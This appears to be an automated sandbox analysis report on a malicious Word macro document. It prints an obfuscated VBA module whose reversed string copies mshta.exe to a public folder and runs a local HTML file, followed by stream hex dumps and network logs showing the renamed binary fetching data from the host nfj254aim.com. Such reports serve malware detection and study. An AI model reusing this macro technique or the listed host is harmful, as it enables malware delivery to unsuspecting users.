                                                                                                                                                                                            Matins
                                                                                                                                                                                            rejoin
                                                                                                                                                                                            Mephistopheles
                                                                                                                                                                                            intimidation
                                                                                                                                                                                            Burdensome
                                                                                                                                                                                            Responsibility
                                                                                                                                                                                            syllogism
                                                                                                                                                                                            Adobe
                                                                                                                                                                                            pounds
                                                                                                                                                                                            patrick
                                                                                                                                                                                            concave
                                                                                                                                                                                            Bequeath
                                                                                                                                                                                            Types
                                                                                                                                                                                            hesse
                                                                                                                                                                                            Select
                                                                                                                                                                                            pragmatic
                                                                                                                                                                                            excavation
                                                                                                                                                                                            magnificent
                                                                                                                                                                                            Vishnu
                                                                                                                                                                                            abolitionist
                                                                                                                                                                                            estimated
                                                                                                                                                                                            occurrence
                                                                                                                                                                                            Vassal
                                                                                                                                                                                            adkJvD
                                                                                                                                                                                            Armenia
                                                                                                                                                                                            Sanctified
                                                                                                                                                                                            dunbar
                                                                                                                                                                                            Systematically
                                                                                                                                                                                            component
                                                                                                                                                                                            Departments
                                                                                                                                                                                            modular
                                                                                                                                                                                            lucrative
                                                                                                                                                                                            Stating
                                                                                                                                                                                            Attica
                                                                                                                                                                                            derivation
                                                                                                                                                                                            attending
                                                                                                                                                                                            Bouquet
                                                                                                                                                                                            losses
                                                                                                                                                                                            leave-taking
                                                                                                                                                                                            Screens
                                                                                                                                                                                            fleshy
                                                                                                                                                                                            primal
                                                                                                                                                                                            Hybrid
                                                                                                                                                                                            )o)l)l)e)h)"),
                                                                                                                                                                                            Redden
                                                                                                                                                                                            utility
                                                                                                                                                                                            clustering
                                                                                                                                                                                            Unless
                                                                                                                                                                                            athens
                                                                                                                                                                                            totality
                                                                                                                                                                                            "adGbPA"
                                                                                                                                                                                            inferno
                                                                                                                                                                                            recurring
                                                                                                                                                                                            expiring
                                                                                                                                                                                            Sampson
                                                                                                                                                                                            languidly
                                                                                                                                                                                            Marrow
                                                                                                                                                                                            trojan
                                                                                                                                                                                            Attribute
                                                                                                                                                                                            Counsellor
                                                                                                                                                                                            Receipt
                                                                                                                                                                                            headers
                                                                                                                                                                                            Inactive
                                                                                                                                                                                            Sundown
                                                                                                                                                                                            lingo
                                                                                                                                                                                            charlotte
                                                                                                                                                                                            thirty-nine
                                                                                                                                                                                            aGSfMv()
                                                                                                                                                                                            VB_Name
                                                                                                                                                                                            Terminal
                                                                                                                                                                                            overran
                                                                                                                                                                                            Wicked
                                                                                                                                                                                            Function
                                                                                                                                                                                            silhouette
                                                                                                                                                                                            recovery
                                                                                                                                                                                            Mario
                                                                                                                                                                                            Infringement
                                                                                                                                                                                            Ticket
                                                                                                                                                                                            pichunter
                                                                                                                                                                                            chemist
                                                                                                                                                                                            Blue-black
                                                                                                                                                                                            brainless
                                                                                                                                                                                            cliff
                                                                                                                                                                                            complacent
                                                                                                                                                                                            compendium
                                                                                                                                                                                            aGSfMv
                                                                                                                                                                                            defilement
                                                                                                                                                                                            annuity
                                                                                                                                                                                            register
                                                                                                                                                                                            foundry
                                                                                                                                                                                            Displacement
                                                                                                                                                                                            remonstrate
                                                                                                                                                                                            VBA Code
                                                                                                                                                                                            Attribute VB_Name = "adGbPA"
                                                                                                                                                                                            Function aGSfMv()
                                                                                                                                                                                            aGSfMv = VBA.Split(aSGxU("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Function adkJvD(ah7ovz)
                                                                                                                                                                                            ' Wicked magnificent lingo component
                                                                                                                                                                                            ' Blue-black cliff compendium chemist silhouette
                                                                                                                                                                                            ' Departments
                                                                                                                                                                                            ' Matins hunt octagonal lens inferno
                                                                                                                                                                                            apa2Q = aGSfMv()
                                                                                                                                                                                            ' Sundown modular kits estimated
                                                                                                                                                                                            ' Redden cl losses
                                                                                                                                                                                            ' Miss
                                                                                                                                                                                            ' Terminal
                                                                                                                                                                                            ' Sail
                                                                                                                                                                                            ' Burdensome pragmatic fleshy complacent
                                                                                                                                                                                            ' Attica utility
                                                                                                                                                                                            ' Armenia remonstrate clustering southwest overran
                                                                                                                                                                                            ' Displacement excavation attending signs root annuity
                                                                                                                                                                                            ' Vassal
                                                                                                                                                                                            ' Stating derivation
                                                                                                                                                                                            ' Responsibility defilement curd hesse athens
                                                                                                                                                                                            ' Bequeath
                                                                                                                                                                                            ' Ticket
                                                                                                                                                                                            ' Receipt patrick
                                                                                                                                                                                            ' Counsellor recovery abolitionist
                                                                                                                                                                                            ' Bouquet headers
                                                                                                                                                                                            ' Adobe
                                                                                                                                                                                            ' Vs. register
                                                                                                                                                                                            Select Case ah7ovz
                                                                                                                                                                                            ' Hybrid dung ewe
                                                                                                                                                                                            ' Sanctified rejoin primal
                                                                                                                                                                                            ' Systematically languidly
                                                                                                                                                                                            ' Technique thirty-nine pounds legitimately
                                                                                                                                                                                            Case 0:
                                                                                                                                                                                            ' Screens
                                                                                                                                                                                            ' Saga foundry neigh pichunter dunbar tale syllogism
                                                                                                                                                                                            ' Marrow trojan astrology row
                                                                                                                                                                                            ' Inactive
                                                                                                                                                                                            adkJvD = apa2Q(1)
                                                                                                                                                                                            ' Unless intervals
                                                                                                                                                                                            ' Sampson lucrative
                                                                                                                                                                                            ' Vishnu tittle charlotte
                                                                                                                                                                                            ' Infringement recurring leave-taking
                                                                                                                                                                                            Case 1:
                                                                                                                                                                                            adkJvD = apa2Q(2)
                                                                                                                                                                                            ' Mario
                                                                                                                                                                                            ' Types expiring brainless occurrence mf intimidation
                                                                                                                                                                                            ' Mephistopheles concave totality
                                                                                                                                                                                            Case 2:
                                                                                                                                                                                            adkJvD = apa2Q(3)
                                                                                                                                                                                            End Select
                                                                                                                                                                                            End Function
                                                                                                                                                                                            Sub ah28l()
                                                                                                                                                                                            aocn4g = ayUxA2(adkJvD(2))
                                                                                                                                                                                            aX4od aocn4g, a6sXJE(a8qpd("comments"))
                                                                                                                                                                                            End Sub

                                                                                                                                                                                            Streams

                                                                                                                                                                                            Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 618
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:PROJECT
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Stream Size:618
                                                                                                                                                                                            Entropy:5.34267626544
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:I D = " { 8 6 2 6 2 4 0 6 - 3 0 4 D - 4 E F A - A 4 4 C - C 5 5 4 C 4 7 8 6 1 3 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a H 8 x m s . . M o d u l e = a R Z c b w . . M o d u l e = a b h 0 R g . . M o d u l e = a 7 A 5 m . . M o d u l e = a d G b P A . . M o d u l e = a I s b 7 . . M o d u l e = a O M v 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 C
                                                                                                                                                                                            Data Raw:49 44 3d 22 7b 38 36 32 36 32 34 30 36 2d 33 30 34 44 2d 34 45 46 41 2d 41 34 34 43 2d 43 35 35 34 43 34 37 38 36 31 33 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 48 38 78 6d 73 0d 0a 4d 6f 64 75 6c 65 3d 61 52 5a 63 62 77 0d 0a 4d 6f 64 75 6c 65 3d 61 62 68 30 52 67 0d 0a 4d 6f 64 75
                                                                                                                                                                                            Stream Path: PROJECTwm, File Type: data, Stream Size: 179
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:PROJECTwm
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:179
                                                                                                                                                                                            Entropy:3.66892704793
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a H 8 x m s . a . H . 8 . x . m . s . . . a R Z c b w . a . R . Z . c . b . w . . . a b h 0 R g . a . b . h . 0 . R . g . . . a 7 A 5 m . a . 7 . A . 5 . m . . . a d G b P A . a . d . G . b . P . A . . . a I s b 7 . a . I . s . b . 7 . . . a O M v 0 . a . O . M . v . 0 . . . . .
                                                                                                                                                                                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 48 38 78 6d 73 00 61 00 48 00 38 00 78 00 6d 00 73 00 00 00 61 52 5a 63 62 77 00 61 00 52 00 5a 00 63 00 62 00 77 00 00 00 61 62 68 30 52 67 00 61 00 62 00 68 00 30 00 52 00 67 00 00 00 61 37 41 35 6d 00 61 00 37 00 41 00 35 00 6d 00 00 00 61 64 47 62 50 41 00 61
                                                                                                                                                                                            Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4172
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:4172
                                                                                                                                                                                            Entropy:4.76403916663
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                                                            Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                                                            Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2119
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/__SRP_0
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:2119
                                                                                                                                                                                            Entropy:3.47748136877
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . A . . . . . . V H . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                                                                                                                                                            Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 230
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/__SRP_1
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:230
                                                                                                                                                                                            Entropy:1.75961915218
                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                            Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                            Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/__SRP_2
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:348
                                                                                                                                                                                            Entropy:1.78450864632
                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08
                                                                                                                                                                                            Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/__SRP_3
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:106
                                                                                                                                                                                            Entropy:1.35911194617
                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Stream Path: VBA/dir, File Type: data, Stream Size: 775
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:VBA/dir
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:775
                                                                                                                                                                                            Entropy:6.59935768005
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                                                                                                                                                            Data Raw:01 03 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 95 d8 b6 61 10 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Dec 3, 2020 10:12:14.717160940 CET4971180192.168.2.3104.28.6.227
                                                                                                                                                                                            Dec 3, 2020 10:12:14.744054079 CET8049711104.28.6.227192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:14.744210958 CET4971180192.168.2.3104.28.6.227
                                                                                                                                                                                            Dec 3, 2020 10:12:14.774555922 CET4971180192.168.2.3104.28.6.227
                                                                                                                                                                                            Dec 3, 2020 10:12:14.801323891 CET8049711104.28.6.227192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:15.259387970 CET8049711104.28.6.227192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:15.259423018 CET8049711104.28.6.227192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:15.259588957 CET4971180192.168.2.3104.28.6.227
                                                                                                                                                                                            Dec 3, 2020 10:12:19.342504025 CET4971180192.168.2.3104.28.6.227

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Dec 3, 2020 10:12:04.872263908 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:04.899449110 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:05.977966070 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:06.005306005 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:07.103354931 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:07.139152050 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:09.160564899 CET6349253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:09.187803984 CET53634928.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:10.486977100 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:10.514538050 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:11.725595951 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:11.763911009 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:12.123970032 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:12.181309938 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:13.119251966 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:13.154472113 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:14.142292023 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:14.185724974 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:14.652942896 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:14.693248034 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:16.145160913 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:16.182802916 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:20.156338930 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:20.191992044 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:35.233314991 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:35.260240078 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:35.375446081 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:35.411010981 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:40.677835941 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:40.704961061 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:41.510663986 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:41.537661076 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:42.374233961 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:42.401274920 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:43.279664993 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:43.315388918 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:44.258956909 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:44.285885096 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:46.834990025 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:46.862232924 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:48.029016018 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:48.055943966 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:48.889570951 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:48.916682005 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:49.686250925 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:49.713371992 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:54.746095896 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:54.773276091 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:12:55.001687050 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:12:55.045443058 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:13:10.023046017 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:13:10.050081968 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:13:15.319488049 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:13:15.356364965 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:13:45.000901937 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:13:45.027858973 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 3, 2020 10:13:46.729356050 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 3, 2020 10:13:46.756539106 CET53606338.8.8.8192.168.2.3

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                            Dec 3, 2020 10:12:14.652942896 CET192.168.2.38.8.8.80xb1c0Standard query (0)nfj254aim.comA (IP address)IN (0x0001)

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                            Dec 3, 2020 10:12:14.693248034 CET8.8.8.8192.168.2.30xb1c0No error (0)nfj254aim.com104.28.6.227A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 3, 2020 10:12:14.693248034 CET8.8.8.8192.168.2.30xb1c0No error (0)nfj254aim.com104.28.7.227A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 3, 2020 10:12:14.693248034 CET8.8.8.8192.168.2.30xb1c0No error (0)nfj254aim.com172.67.164.220A (IP address)IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • nfj254aim.com

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.349711104.28.6.22780C:\Users\Public\ms.com
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Dec 3, 2020 10:12:14.774555922 CET222OUTGET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Language: en-us
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                            Host: nfj254aim.com
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Dec 3, 2020 10:12:15.259387970 CET223INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Thu, 03 Dec 2020 09:12:15 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Set-Cookie: __cfduid=db45345ad08a18f657e4a03edb0b079811606986734; expires=Sat, 02-Jan-21 09:12:14 GMT; path=/; domain=.nfj254aim.com; HttpOnly; SameSite=Lax
                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            cf-request-id: 06c978b4c300004108a9184000000001
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=H4niUpCS7%2BC208vQfiad1anE7NOXSNEYndum6HLdaELV%2FNuAJowlMmAjfBoiaJyI2IJmUbAyy30qCmG16MVq73eLeu8JV1tZ%2BMLPGCtd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 5fbc2a346bd44108-PRG
                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                            Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3f 0f 82 30 14 c4 f7 7e 8a 27 bb 3c 20 8c 2f 1d 14 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d fe f9 f6 06 58 5c ef ee 77 77 b4 49 4e 7b 71 a9 52 38 88 63 01 55 bd 2b f2 3d 78 5b c4 3c 15 19 62 22 92 d5 89 fc 00 31 2d 3d ce 48 bb 47 c7 49 ab 46 72 46 ae 75 9d e2 71 10 43 69 1c 64 66 ea 25 e1 2a 32 c2 25 44 57 23 bf 33 17 f2 bf 8c 0e 39 a3 81 0b ad 60 54 cf 49 59 a7 24 d4 e7 02 bc 8f 1d 6e 32 f2 e0 dd 58 e8 8d 83 fb 0c 80 e9 c1 e9 d6 82 55 e3 4b 8d 3e e1 30 0f 2c d5 84 cb 25 f6 03 00 00 ff ff 03 00 0c 45 8d 50 cd 00 00 00 0d 0a
                                                                                                                                                                                            Data Ascii: baL?0~'< /$mMI"-X\wwIN{qR8cU+=x[<b"1-=HGIFrFuqCidf%*2%DW#39`TIY$n2XUK>0,%EP
                                                                                                                                                                                            Dec 3, 2020 10:12:15.259423018 CET223INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


